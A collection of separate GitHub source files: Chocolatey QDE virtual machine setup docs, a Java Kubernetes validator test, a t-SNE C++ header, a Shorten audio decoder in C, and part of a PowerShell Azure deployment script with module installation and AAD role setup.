Summary: ![QDE Hyper-V Appliance Import](images/quickdeploy/QDE-hypervapp.gif) ### Platform: Hyper-V (VHD file) 1. Download VHD from provided link, and unzip it to the directory you wish to store it in. 2. Increase the size of the VHD, for example to 500GB. Increase to what you feel comfortable with. ```powershell # This only increases the available size of the image # You will still need to increase the space for the C drive Resize-VHD -Path C:\path\to\QuickDeploy Environment.vhd -Size 500GB ``` 3. Open Hyper-V Manager. 4. Create a new VM. 5. If prompted, choose a `Generation 1` virtual machine option. 6. Set startup memory to `8192 MB` (you can specify this later as well). 7. When asked to create a new disk or use an existing one, select the `Use existing virtual disk` option and browse to the VHD you unzipped in Step 1. 8. Adjust the hardware specifications of the VM. For a performant system, the following are recommended: - 4 vCPUs - 8 GB RAM 9. Windows 10 and Windows Server 2016/2019 version of Hyper-V now come with built-in support for Hyper-V Integration Services, as they automatically get pushed to guest VM's. In older versions of Hyper-V, you should see an option to `Insert Integration Services Setup Disk`. You can use this option to install and enable Hyper-V Integration Services. Video Summary: ![QDE Hyper-V VHD](images/quickdeploy/QDE-hyperv.gif) ### Platform: VMware (VMDK file) 1. Download VMDK from provided link, and unzip it to the directory you wish to store it. 2. For ESX/ESXi, open vSphere and upload the downloaded VMDK to your datastore. 3. Create a new VM. 4. When prompted for OS type, choose `Windows Server 2019` (if available), or `Windows Server 2016 or later`. 5. If prompted for boot firmware, choose `Legacy BIOS` (**not** UEFI). 6. When asked to create a new disk or attach, delete the default disk, select attach, and browse to the VMDK you uploaded. **IMPORTANT**: [vCenter/ESX/ESXi] You **must** select an `IDE controller` under the “Controller Location” setting of the disk. If you leave the controller as SCSI (default), your VM will not boot. 7. Adjust the hardware specifications of the VM. For a performant system, the following are recommended: - 4 vCPUs - 8 GB RAM 8. Once you click Finish, go back into the `Edit settings` context menu for the VM, and expand the disk you attached to 500GB (double-check in OS, and extend if needed). **NOTE**: likely you will need to allocate the additional space to the C drive. 9. Boot up VM, and Install VMware Tools using the console menus (this will require a reboot). Video Summary: * VMware ESX/i: ![QDE VMware VMDK](images/quickdeploy/QDE-vmdk-esx.gif) * VMware Fusion (Mac OS): ![QDE VMware VMDK](images/quickdeploy/QDE-vmdk-fusion.gif) ### Platform: VMware (OVF template) > :warning: **WARNING** > > The OVF import method can be tricky. Unless you have the **exact** same network settings as the host where the OVF was exported, you will likely run into failures on attempts to import it. You _could_ workaround this by creating your own VM first, exporting the OVF file, using the Network settings from this file to replace the 2 sections of Network settings in the OVF of QDE, and then attempt to import the OVF for QDE. However, we realize this process is cumbersome, and would **strongly** advise you utilize the VMDK import method above for greatest compatibility. We are working to improve this process, but as of right now, the OVF method is to be used at your own risk. 1. Download OVF file and unzip it to the directory you wish to store it. 2. Review instructions for deploying a VM from an OVF file [here](https://docs.vmware.com/en/VMware-vSphere/6.0/com.vmware.vsphere.html.hostclient.doc/GUID-FBEED81C-F9D9-4193-BDCC-CC4A60C20A4E_copy.html). 3. Adjust settings of newly imported VM to our recommended: - 4 vCPUs - 8 GB RAM 4. Install VMWare Tools on the VM once booted (this will require a reboot). ### Platform: Other Most likely you are going to download the VMDK file and convert it to your platform. Please reach out to support to see what options are available. ___ ## Step 2: Other Considerations for Virtual Environment ### Step 2.1: DNS Settings The QDE environment is configured by default to use DHCP for easier initial setup. You will likely need to reconfigure it with a static IP address depending on your organization's policies. ___ ## Step 3: Virtual Environment Setup On the desktop of your QDE VM, there is a `Readme.html` file, that will guide you through the rest of the setup process once you are logged in. A version of this readme file can be found in the [[Quick Deployment Desktop Readme|QuickDeploymentDesktopReadme]]. > :memo: **NOTE**: The online version is likely more up to date than the ReadMe you will find on the desktop (not including redacted items like credentials). If there are conflicts between the desktop readme and what you see online, prefer the online version. > :warning: **WARNING**: If you have an existing corporate environment you will be servicing with the QDE VM, be sure to perform your organization-specific initial configuration **_before_** running setup scripts. ### Step 3.1: Expand Disk Size On the machine, please check the size of the C drive. If the volume needs to be expanded, expand it to the space you've allocated for the machine by running this command in a PowerShell administrative console: ```powershell # This should increase the space available on the C drive. Resize-Partition -DriveLetter C -Size ((Get-PartitionSupportedSize -DriveLetter C).SizeMax) ``` Alternatively, you can use the Disk Management utility to expand the disk, if a GUI is preferred. ### Step 3.2: Add License File to QDE In the [[Quick Deployment Desktop Readme|QuickDeploymentDesktopReadme]], it is going to ask you to use the license file. That license file comes from an external location. It is best to copy/paste the file into QDE as a whole file, but you may have needed to set up any kind of extensions available for that. > :warning: **WARNING** > > If you find that you need to copy the text and paste the license file text into a new file in QDE, the file format and name is extremely important to get right. If you don't have UTF-8 or there is a space inserted, Chocolatey will consider it invalid. > Please contact support if you need help here. ### Step 3.3: Regenerate SSL Certificates See [[QDE SSL/TLS Setup|QuickDeploymentSslSetup]]. ### Step 3.4: Database Password Changes (Optional) The database credentials are currently pre-set. If you would like to change the credentials associated with the database, you will need to follow these steps. 1. Change the database access credentials 2. Reinstall the chocolatey-management-service package ```powershell choco uninstall chocolatey-management-service -y choco install chocolatey-management-service -y --package-parameters-sensitive=”’/ConnectionString=””Server=localhost\SQLEXPRESS;Database=ChocolateyManagement;User ID=ChocoUser;Password=NewPassword;””’” ``` 3. Reinstall the chocolatey-management-web package ```powershell choco uninstall chocolatey-management-web -y Choco install chocolatey-management-web -y --package-parameters-sensitive=”’/ConnectionString=””Server=Localhost\SQLEXPRESS;Database=ChocolateyManagement;User ID=ChocoUser;Password=NewPassword;””’” ``` ___ ## Step 4: Firewall Changes See [[QDE Firewall Changes|QuickDeploymentFirewallChanges]]. ___ ## Step 5: Install and Configure Chocolatey on Clients See [[QDE Client Setup|QuickDeploymentClientSetup]]. ___ ## FAQ ### How do I upgrade QDE? While we will continue to make improvements to the QDE, there is no upgrade path for the Virtual Machine itself. You can choose to start over with a newer version, but that feels like the wrong way to go. It is simple to upgrade the components and that it how we recommend upgrading aspects of QDE. Should you want to upgrade say Central Management, you can follow the Central Management steps for upgrade at [[Upgrade Central Management|CentralManagementSetupUpgrade]]. ___ [[Quick Deployment Environment|QuickDeploymentEnvironment]]
{ "pile_set_name": "Github" }
/* * Copyright (c) 2012-2018 Red Hat, Inc. * This program and the accompanying materials are made * available under the terms of the Eclipse Public License 2.0 * which is available at https://www.eclipse.org/legal/epl-2.0/ * * SPDX-License-Identifier: EPL-2.0 * * Contributors: * Red Hat, Inc. - initial API and implementation */ package org.eclipse.che.workspace.infrastructure.kubernetes.environment; import org.mockito.InjectMocks; import org.mockito.Mock; import org.mockito.testng.MockitoTestNGListener; import org.testng.annotations.Listeners; import org.testng.annotations.Test; /** * Tests {@link KubernetesEnvironmentValidator}. * * @author Sergii Leshchenko */ @Listeners(MockitoTestNGListener.class) public class KubernetesEnvironmentValidatorTest { @Mock private KubernetesEnvironmentPodsValidator podsValidator; @Mock private KubernetesEnvironment kubernetesEnvironment; @InjectMocks private KubernetesEnvironmentValidator environmentValidator; @Test public void shouldPerformChecksOnEnvironmentValidation() throws Exception { // when environmentValidator.validate(kubernetesEnvironment); // then podsValidator.validate(kubernetesEnvironment); } }
{ "pile_set_name": "Github" }
/* * * Copyright (c) 2014, Laurens van der Maaten (Delft University of Technology) * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Delft University of Technology. * 4. Neither the name of the Delft University of Technology nor the names of * its contributors may be used to endorse or promote products derived from * this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY LAURENS VAN DER MAATEN ''AS IS'' AND ANY EXPRESS * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO * EVENT SHALL LAURENS VAN DER MAATEN BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR * BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING * IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY * OF SUCH DAMAGE. * */ #ifndef TSNE_H #define TSNE_H static inline double sign(double x) { return (x == .0 ? .0 : (x < .0 ? -1.0 : 1.0)); } class TSNE { public: void run(double* X, int N, int D, double* Y, int no_dims, double perplexity, double theta); bool load_data(double** data, int* n, int* d, int* no_dims, double* theta, double* perplexity, int* rand_seed); void save_data(double* data, int* landmarks, double* costs, int n, int d); void symmetrizeMatrix(unsigned int** row_P, unsigned int** col_P, double** val_P, int N); // should be static! private: void computeGradient(double* P, unsigned int* inp_row_P, unsigned int* inp_col_P, double* inp_val_P, double* Y, int N, int D, double* dC, double theta); void computeExactGradient(double* P, double* Y, int N, int D, double* dC); double evaluateError(double* P, double* Y, int N, int D); double evaluateError(unsigned int* row_P, unsigned int* col_P, double* val_P, double* Y, int N, int D, double theta); void zeroMean(double* X, int N, int D); void computeGaussianPerplexity(double* X, int N, int D, double* P, double perplexity); void computeGaussianPerplexity(double* X, int N, int D, unsigned int** _row_P, unsigned int** _col_P, double** _val_P, double perplexity, int K); void computeSquaredEuclideanDistance(double* X, int N, int D, double* DD); double randn(); }; #endif
{ "pile_set_name": "Github" }
/* * Shorten decoder * Copyright (c) 2005 Jeff Muizelaar * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ /** * @file shorten.c * Shorten decoder * @author Jeff Muizelaar * */ #include "bitstream.h" #include "golomb.h" #include "shndec.h" #include "codeclib.h" #define ULONGSIZE 2 #define WAVE_FORMAT_PCM 0x0001 #define TYPESIZE 4 #define CHANSIZE 0 #define LPCQSIZE 2 #define ENERGYSIZE 3 #define BITSHIFTSIZE 2 #define TYPE_S16HL 3 /* signed 16 bit shorts: high-low */ #define TYPE_S16LH 5 /* signed 16 bit shorts: low-high */ #define NWRAP 3 #define NSKIPSIZE 1 #define LPCQUANT 5 #define V2LPCQOFFSET (1 << LPCQUANT) #define FNSIZE 2 #define VERBATIM_CKSIZE_SIZE 5 #define VERBATIM_BYTE_SIZE 8 #define CANONICAL_HEADER_SIZE 44 #define MKTAG(a,b,c,d) (a | (b << 8) | (c << 16) | (d << 24)) #define get_le16(gb) bswap_16(get_bits_long(gb, 16)) #define get_le32(gb) bswap_32(get_bits_long(gb, 32)) /* converts fourcc string to int */ static unsigned int ff_get_fourcc(const char *s){ //assert( strlen(s)==4 ); return (s[0]) + (s[1]<<8) + (s[2]<<16) + (s[3]<<24); } static unsigned int get_uint(ShortenContext *s, int k) { if (s->version != 0) k = get_ur_golomb_shorten(&s->gb, ULONGSIZE); return get_ur_golomb_shorten(&s->gb, k); } #if defined(CPU_COLDFIRE) static inline void coldfire_lshift_samples(int n, int shift, int32_t *samples) { /* for (i = 0; i < n; i++) samples[i] =<< shift; */ asm volatile ( "move.l %[n], %%d0 \n" /* d0 = loop counter */ "asr.l #2, %%d0 \n" "beq 1f \n" "2:" /* main loop (unroll by 4) */ "movem.l (%[x]), %%d4-%%d7 \n" "asl.l %[s], %%d4 \n" "asl.l %[s], %%d5 \n" "asl.l %[s], %%d6 \n" "asl.l %[s], %%d7 \n" "movem.l %%d4-%%d7, (%[x]) \n" "lea.l (16, %[x]), %[x] \n" "subq.l #1, %%d0 \n" "bne 2b \n" "1:" /* any loops left? */ "and.l #3, %[n] \n" "beq 4f \n" "3:" /* remaining loops */ "move.l (%[x]), %%d4 \n" "asl.l %[s], %%d4 \n" "move.l %%d4, (%[x])+ \n" "subq.l #1, %[n] \n" "bne 3b \n" "4:" /* exit */ : [n] "+d" (n), [x] "+a" (samples) : [s] "d" (shift) : "%d0", "%d4", "%d5", "%d6", "%d7", "cc", "memory" ); } #endif static inline void fix_bitshift(ShortenContext *s, int32_t *samples) { int i; /* Wrapped samples don't get bitshifted, so we'll do them during the next iteration. */ if (s->bitshift != 0) { #if defined(CPU_COLDFIRE) coldfire_lshift_samples(s->blocksize, s->bitshift, samples - s->nwrap); #else for (i = -s->nwrap; i < (s->blocksize - s->nwrap); i++) samples[i] <<= s->bitshift; #endif } /* Also, when we have to remember to fix the wrapped samples when the bitshift changes.*/ if (s->bitshift != s->last_bitshift) { if (s->last_bitshift != 0) for (i = -s->nwrap; i < 0; i++) samples[i] <<= s->last_bitshift; s->last_bitshift = s->bitshift; } } static inline void decode_subframe_lpc(ShortenContext *s, int32_t *decoded, int residual_size, int pred_order) { int sum, i, j; int coeffs[MAX_PRED_ORDER]; for (i=0; i<pred_order; i++) { coeffs[i] = get_sr_golomb_shorten(&s->gb, LPCQUANT); } for (i=0; i < s->blocksize; i++) { sum = s->lpcqoffset; for (j=0; j<pred_order; j++) sum += coeffs[j] * decoded[i-j-1]; decoded[i] = get_sr_golomb_shorten(&s->gb, residual_size) + (sum >> LPCQUANT); } } static inline int shorten_decode_frame(ShortenContext *s, int32_t *decoded, int32_t *offset) { int i; int32_t sum; int cmd = get_ur_golomb_shorten(&s->gb, FNSIZE); switch (cmd) { case FN_ZERO: case FN_DIFF0: case FN_DIFF1: case FN_DIFF2: case FN_DIFF3: case FN_QLPC: { int residual_size = 0; int32_t coffset; if (cmd != FN_ZERO) { residual_size = get_ur_golomb_shorten(&s->gb, ENERGYSIZE); /* this is a hack as version 0 differed in defintion of get_sr_golomb_shorten */ if (s->version == 0) residual_size--; } if (s->nmean == 0) { coffset = offset[0]; } else { sum = (s->version < 2) ? 0 : s->nmean / 2; for (i=0; i<s->nmean; i++) sum += offset[i]; coffset = sum / s->nmean; if (s->version >= 2) coffset >>= FFMIN(1, s->bitshift); } switch (cmd) { case FN_ZERO: for (i=0; i<s->blocksize; i++) decoded[i] = 0; break; case FN_DIFF0: for (i=0; i<s->blocksize; i++) decoded[i] = get_sr_golomb_shorten(&s->gb, residual_size) + coffset; break; case FN_DIFF1: for (i=0; i<s->blocksize; i++) decoded[i] = get_sr_golomb_shorten(&s->gb, residual_size) + decoded[i - 1]; break; case FN_DIFF2: for (i=0; i<s->blocksize; i++) decoded[i] = get_sr_golomb_shorten(&s->gb, residual_size) + 2*decoded[i-1] - decoded[i-2]; break; case FN_DIFF3: for (i=0; i<s->blocksize; i++) decoded[i] = get_sr_golomb_shorten(&s->gb, residual_size) + 3*decoded[i-1] - 3*decoded[i-2] + decoded[i-3]; break; case FN_QLPC: { int pred_order = get_ur_golomb_shorten(&s->gb, LPCQSIZE); for (i=0; i<pred_order; i++) decoded[i - pred_order] -= coffset; decode_subframe_lpc(s, decoded, residual_size, pred_order); if (coffset != 0) { for (i=0; i < s->blocksize; i++) decoded[i] += coffset; } } } if (s->nmean > 0) { sum = (s->version < 2) ? 0 : s->blocksize / 2; for (i=0; i<s->blocksize; i++) sum += decoded[i]; for (i=1; i<s->nmean; i++) offset[i-1] = offset[i]; if (s->version < 2) { offset[s->nmean - 1] = sum / s->blocksize; } else { offset[s->nmean - 1] = (sum / s->blocksize) << s->bitshift; } } fix_bitshift(s, decoded); break; } case FN_VERBATIM: i = get_ur_golomb_shorten(&s->gb, VERBATIM_CKSIZE_SIZE); while (i--) get_ur_golomb_shorten(&s->gb, VERBATIM_BYTE_SIZE); break; case FN_BITSHIFT: s->bitshift = get_ur_golomb_shorten(&s->gb, BITSHIFTSIZE); break; case FN_BLOCKSIZE: s->blocksize = get_uint(s, av_log2(s->blocksize)); break; case FN_QUIT: break; default: return FN_ERROR; break; } return cmd; } int shorten_decode_frames(ShortenContext *s, int *nsamples, int32_t *decoded0, int32_t *decoded1, int32_t *offset0, int32_t *offset1, uint8_t *buf, int buf_size, void (*yield)(void)) { int32_t *decoded, *offset; int cmd; *nsamples = 0; init_get_bits(&s->gb, buf, buf_size*8); get_bits(&s->gb, s->bitindex); int n = 0; while (n < NUM_DEC_LOOPS) { int chan = n%2; if (chan == 0) { decoded = decoded0 + s->nwrap + *nsamples; offset = offset0; } else { decoded = decoded1 + s->nwrap + *nsamples; offset = offset1; } yield(); cmd = shorten_decode_frame(s, decoded, offset); if (cmd == FN_VERBATIM || cmd == FN_BITSHIFT || cmd == FN_BLOCKSIZE) { continue; } else if (cmd == FN_QUIT || cmd == FN_ERROR) { break; } *nsamples += chan * s->blocksize; n++; } if (*nsamples) { /* Wrap the samples for the next loop */ int i; for (i = 0; i < s->nwrap; i++) { decoded0[i] = decoded0[*nsamples + i]; decoded1[i] = decoded1[*nsamples + i]; } /* Scale the samples for the pcmbuf */ int scale = SHN_OUTPUT_DEPTH - s->bits_per_sample; #if defined(CPU_COLDFIRE) coldfire_lshift_samples(*nsamples, scale, decoded0 + s->nwrap); coldfire_lshift_samples(*nsamples, scale, decoded1 + s->nwrap); #else for (i = 0; i < *nsamples; i++) { decoded0[i + s->nwrap] <<= scale; decoded1[i + s->nwrap] <<= scale; } #endif } return cmd; } static int decode_wave_header(ShortenContext *s, uint8_t *header, int header_size) { GetBitContext hb; int len; init_get_bits(&hb, header, header_size*8); if (get_le32(&hb) != MKTAG('R','I','F','F')) { return -8; } int chunk_size = get_le32(&hb); if (get_le32(&hb) != MKTAG('W','A','V','E')) { return -9; } while (get_le32(&hb) != MKTAG('f','m','t',' ')) { len = get_le32(&hb); skip_bits(&hb, 8*len); } len = get_le32(&hb); if (len < 16) { return -10; } if (get_le16(&hb) != WAVE_FORMAT_PCM ) { return -11; } s->channels = get_le16(&hb); if (s->channels > MAX_CHANNELS) { return -3; } s->sample_rate = get_le32(&hb); skip_bits(&hb, 32); //s->bit_rate = 8*get_le32(&hb); int block_align = get_le16(&hb); s->totalsamples = (chunk_size - 36) / block_align; s->bits_per_sample = get_le16(&hb); if (s->bits_per_sample != 16) { return -12; } len -= 16; if (len > 0) { return len; } return 0; } int shorten_init(ShortenContext* s, uint8_t *buf, int buf_size) { int i; s->blocksize = DEFAULT_BLOCK_SIZE; s->channels = 1; s->nmean = -1; init_get_bits(&s->gb, buf, buf_size*8); get_bits(&s->gb, s->bitindex); /* shorten signature */ if (get_bits_long(&s->gb, 32) != bswap_32(ff_get_fourcc("ajkg"))) { return -1; } s->version = get_bits(&s->gb, 8); int internal_ftype = get_uint(s, TYPESIZE); if ((internal_ftype != TYPE_S16HL) && (internal_ftype != TYPE_S16LH)) { return -2; } s->channels = get_uint(s, CHANSIZE); if (s->channels > MAX_CHANNELS) { return -3; } /* get blocksize if version > 0 */ int maxnlpc = 0; if (s->version > 0) { s->blocksize = get_uint(s, av_log2(DEFAULT_BLOCK_SIZE)); maxnlpc = get_uint(s, LPCQSIZE); s->nmean = get_uint(s, 0); int skip_bytes = get_uint(s, NSKIPSIZE); for (i=0; i<skip_bytes; i++) { skip_bits(&s->gb, 8); } } if (s->nmean > MAX_NMEAN) { return -4; } s->nwrap = FFMAX(NWRAP, maxnlpc); if (s->nwrap > MAX_NWRAP) { return -5; } if (s->version > 1) s->lpcqoffset = V2LPCQOFFSET; if (get_ur_golomb_shorten(&s->gb, FNSIZE) != FN_VERBATIM) { return -6; } uint8_t header[MAX_HEADER_SIZE]; int header_size = get_ur_golomb_shorten(&s->gb, VERBATIM_CKSIZE_SIZE); if (header_size >= MAX_HEADER_SIZE || header_size < CANONICAL_HEADER_SIZE) { return -7; } for (i=0; i<header_size; i++) header[i] = (char)get_ur_golomb_shorten(&s->gb, VERBATIM_BYTE_SIZE); s->header_bits = s->gb.index; return decode_wave_header(s, header, header_size); }
{ "pile_set_name": "Github" }
param( [string] $ParamFile = "common.parameters.txt", [string] $subscriptionId, [string] $certPassword, [string] $sparkPassword, [string] $sparkSshPassword, [string] $sfPassword, [string] $resourceGroupName, [ValidatePattern('^[a-zA-Z0-9_.-]*$')] [ValidateLength(0, 40)] [string] $productName, [string] $resourceGroupLocation, [ValidateSet("EastUS", "SouthCentralUS", "NorthEurope", "WestEurope", "SoutheastAsia", "WestUS2", "CanadaCentral", "CentralIndia")] [string] $resourceLocationForMicrosoftInsights, [string] $resourceLocationForServiceFabric, [ValidateScript({Test-Path $_ })] [string] $deploymentCommonPath, [ValidateSet("y", "n")] [string] $generateAndUseSelfSignedCerts, [string] $mainCert, [string] $reverseProxyCert, [string] $sslCert, [ValidateSet("y", "n")] [string] $installModules, [ValidateSet("y", "n")] [string] $resourceCreation, [ValidateSet("y", "n")] [string] $sparkCreation, [ValidateSet("y", "n")] [string] $serviceFabricCreation, [ValidateSet("y", "n")] [string] $setupSecrets, [ValidateSet("y", "n")] [string] $setupCosmosDB, [ValidateSet("y", "n")] [string] $setupKVAccess ) $user = [Security.Principal.WindowsIdentity]::GetCurrent(); $ret = (New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator) if (!$ret) { Write-Host "The current command prompt session is not running as Administrator. Start command prompt by using the Run as Administrator option, and then try running the script again." Exit 50 } $ErrorActionPreference = "stop" Get-Content $ParamFile | Foreach-Object { $l = $_.Trim() if ($l.startsWith('#') -or $l.startsWith('//') -or !$l) { return } $var = $l.Split('=', 2) set-Variable -Name $var[0] -Value $var[1] } if ($deployResources -ne 'y') { Write-Host "deployResources parameter value is not 'y'. This script will not execute." Exit 0 } if ($generateNewSelfSignedCerts -eq 'n' -and !$certPassword) { Write-Host "Please provide certPassword to import the existing certs" Exit 40 } Remove-Item -path ".\cachedVariables" -Force -ErrorAction SilentlyContinue $rootFolderPath = $PSScriptRoot Import-Module "..\Deployment.Common\Helpers\UtilityModule" -ArgumentList $rootFolderPath, $resourceGroupName, $productName, $sparkClusterName, $randomizeProductName, $serviceFabricClusterName, $serviceAppName, $clientAppName, $sparkPassword, $sparkSshPassword, $sfPassword, $certPassword, $redisCacheSize -WarningAction SilentlyContinue Set-Content -Path ".\cachedVariables" -NoNewline -Value $name function Install-Modules { Write-Host -ForegroundColor Green "Checking Module... " Write-Host -ForegroundColor Green "Estimated time to complete: 5 mins" Write-Host "Note: If any module is installed, you will have to close this prompt and restart deploy.bat as admin again... " $modules = New-Object 'System.Collections.Generic.Dictionary[String,String]' $modules.Add("azurerm", "6.13.1") $modules.Add("azuread", "2.0.2.4") $modules.Add("mdbc", " 5.1.4") $moduleInstalled = $false # Make sure to install correct required version of PS modules. # Since, Mdbc PS module doesn't support New-MdbcQuery cmdlet from v6.0.0, we have to make sure correct Mdbc module is installed. # https://github.com/nightroman/Mdbc/blob/master/Release-Notes.md#v600 $modules.Keys | foreach { if (!(Get-installedModule -name $_ -RequiredVersion $modules.Item($_) -ErrorAction SilentlyContinue )) { Write-Host "Install Module: " $_ $moduleInstalled = $true Install-Module -Name $_ -Force -AllowClobber -Scope CurrentUser -Repository PSGallery } } if ($moduleInstalled) { Write-Host -ForegroundColor Yellow "The script execution completed after one or more packages have been installed. In order to use the latest packages, please close this prompt, open a new command prompt as admin and run deploy.bat again" Exit 10 } else{ # Import correct version of PS modules. $modules.Keys | ForEach-Object { Write-Host "Importing Module: "$_" Version: "$modules.Item($_) Import-Module -Name $_ -RequiredVersion $modules.Item($_) -Force Write-Host "Imported Module: "$_" Version: "$modules.Item($_) } } } # Check if file paths exist function Check-FilePath { $notFound= $paths = @("$deploymentCommonPath\CosmosDB", "$deploymentCommonPath\Scripts", "$deploymentCommonPath\Resources") foreach ($p in $paths) { if (!(Test-Path $p)) { Write-Host "$p does not exist" Exit 20 } } } # Generate tokens with the actual values function Get-Tokens { $tokens = Get-DefaultTokens # Template $tokens.Add('subscriptionId', $subscriptionId ) $tokens.Add('resourceLocationForMicrosoftInsights', $resourceLocationForMicrosoftInsights ) $tokens.Add('tenantId', $tenantId ) $tokens.Add('userId', $userId ) $sparkType = 'hdinsight' $keyvaultPrefix = 'keyvault' $dataxJobTemplate = 'DataXDirect' $dataxKafkaJobTemplate = 'kafkaDataXDirect' $dataxBatchJobTemplate = 'DataXBatch' if ($useDatabricks -eq 'y') { $sparkType = 'databricks' $keyvaultPrefix = 'secretscope' $dataxJobTemplate = 'DataXDirectDatabricks' $dataxKafkaJobTemplate = 'kafkaDataXDirectDatabricks' $dataxBatchJobTemplate = 'DataXBatchDatabricks' $tokens.Add('databricksClusterSparkVersion', $databricksClusterSparkVersion) $tokens.Add('databricksClusterNodeType', $databricksClusterNodeType) $tokens.Add('databricksSku', $databricksSku) $tokens.Add('dbResourceGroupName', $resourceGroupName) } else { $tokens.Add('HDInsightVersion', $HDInsightVersion) $tokens.Add('sparkComponentVersion', $sparkComponentVersion) $tokens.Add('enableHDInsightAutoScaling', $enableHDInsightAutoScaling) if($enableHDInsightAutoScaling -eq 'y') { $tokens.Add('minNodesForHDInsightAutoScaling', $minNodesForHDInsightAutoScaling) $tokens.Add('maxNodesForHDInsightAutoScaling', $maxNodesForHDInsightAutoScaling) } } $tokens.Add('sparkType', $sparkType) $tokens.Add('keyvaultPrefix', $keyvaultPrefix) $tokens.Add('dataxJobTemplate', $dataxJobTemplate) $tokens.Add('dataxKafkaJobTemplate', $dataxKafkaJobTemplate) $tokens.Add('dataxBatchJobTemplate', $dataxBatchJobTemplate) # CosmosDB $tokens.Add('blobopsconnectionString', $blobopsconnectionString ) $tokens.Add('configgenClientId', $azureADApplicationConfiggenApplicationId ) $tokens.Add('configgenTenantId', $tenantName ) # SF Template $tokens.Add('certPrimaryThumbprint', $certPrimary.Certificate.Thumbprint ) $tokens.Add('certPrimarySecretId', $certPrimary.SecretId ) $tokens.Add('certReverseProxyThumbprint', $certReverseProxy.Certificate.Thumbprint ) $tokens.Add('certReverseProxySecretId', $certReverseProxy.SecretId ) $tokens.Add('sslcertThumbprint', $certSSL.Certificate.Thumbprint ) $tokens.Add('resourceLocationForServiceFabric', $resourceLocationForServiceFabric ) $tokens.Add('vmNodeTypeSize', $vmNodeTypeSize ) $tokens.Add('vmNodeinstanceCount', $vmNodeinstanceCount ) # Spark Template $tokens.Add('vmSizeSparkHeadnode', $vmSizeSparkHeadnode ) $tokens.Add('minInstanceCountSparkHeadnode', $minInstanceCountSparkHeadnode ) $tokens.Add('targetInstanceCountSparkHeadnode', $targetInstanceCountSparkHeadnode ) $tokens.Add('vmSizeSparkWorkernode', $vmSizeSparkWorkernode ) $tokens.Add('targetInstanceCountSparkWorkernode', $targetInstanceCountSparkWorkernode ) # Service param $tokens.Add('writerRole', $writerRole ) $tokens.Add('readerRole', $readerRole ) $tokens.Add('serviceSecretPrefix', $serviceSecretPrefix ) $tokens.Add('clientSecretPrefix', $clientSecretPrefix ) $tokens.Add('serviceAppId', $azureADApplicationConfiggenApplicationId ) $tokens.Add('clientAppId', $azureADApplicationApplicationId ) $tokens.Add('azureADApplicationConfiggenResourceId', $azureADApplicationConfiggenResourceId ) $aiKey = '' $appInsight = Get-AzureRmApplicationInsights -resourceGroupName $resourceGroupName -Name $appInsightsName -ErrorAction SilentlyContinue if ($appInsight) { $aiKey = $appInsight.InstrumentationKey } $tokens.Add('appInsightKey', $aiKey ) $tokens.Add('resourceLocation', $resourceGroupLocation ) $certtype = '' if ($useSelfSignedCerts -eq 'y') { $certtype = 'test' } $tokens.Add('certtype', $certtype ) $kafkaNativeConnectionString = '' $kafkaNativeTopics = '' if($enableKafkaSample -eq 'y') { $kafkaNativeConnectionString = "datagen-kafkaNativeConnectionString" $kafkaNativeTopics = "kafka1,kafka2" } $tokens.Add('kafkaNativeConnectionString', $kafkaNativeConnectionString) $tokens.Add('kafkaNativeTopics', $kafkaNativeTopics) $tokens } # Get appRole definition function Create-AppRole([string] $Name, [string] $AppName, [string] $Description) { $appRole = New-Object Microsoft.Open.AzureAD.Model.AppRole $appRole.AllowedMemberTypes = New-Object System.Collections.Generic.List[string] $appRole.AllowedMemberTypes.Add("User"); if (($Name -eq $writerRole) -and ($AppName -eq $serviceAppName)) { $appRole.AllowedMemberTypes.Add("Application"); } $appRole.DisplayName = $Name $appRole.Id = New-Guid $appRole.IsEnabled = $true $appRole.Description = $Description $appRole.Value = $Name $appRole } # Add appRoles to AAD app function Set-AzureAADAppRoles([string]$AppName) { $role_r = Create-AppRole -Name $readerRole -AppName $AppName -Description $readerRole + " have ability to view flows" $role_w = Create-AppRole -Name $writerRole -AppName $AppName -Description $writerRole + " can manage flows" $roles = @($role_r, $role_W) $app = Get-AzureADApplication -Filter "DisplayName eq '$AppName'" if ($app.AppRoles) { foreach($r in $roles) { $role = $app.AppRoles | Where-Object { $_.Value -match $r.Value } if (!$role) { $app.AppRoles.Add($r) Set-AzureADApplication -ObjectId $app.ObjectId -AppRoles $app.AppRoles } } } else { foreach($r in $roles) { $app.AppRoles.Add($r) | Out-Null } Set-AzureADApplication -ObjectId $app.ObjectId -AppRoles $app.AppRoles } } # Add user with appRoles to service principal function Add-UserAppRole([string]$AppName) { $sp = Get-AzureADServicePrincipal -Filter "DisplayName eq '$AppName'" $appRole = $sp.AppRoles | Where-Object { $_.Value -match $writerRole } try { New-AzureADUserAppRoleAssignment -ObjectId $userId -PrincipalId $userId -ResourceId $sp.ObjectId -Id $appRole.Id } catch {} } # Set secret 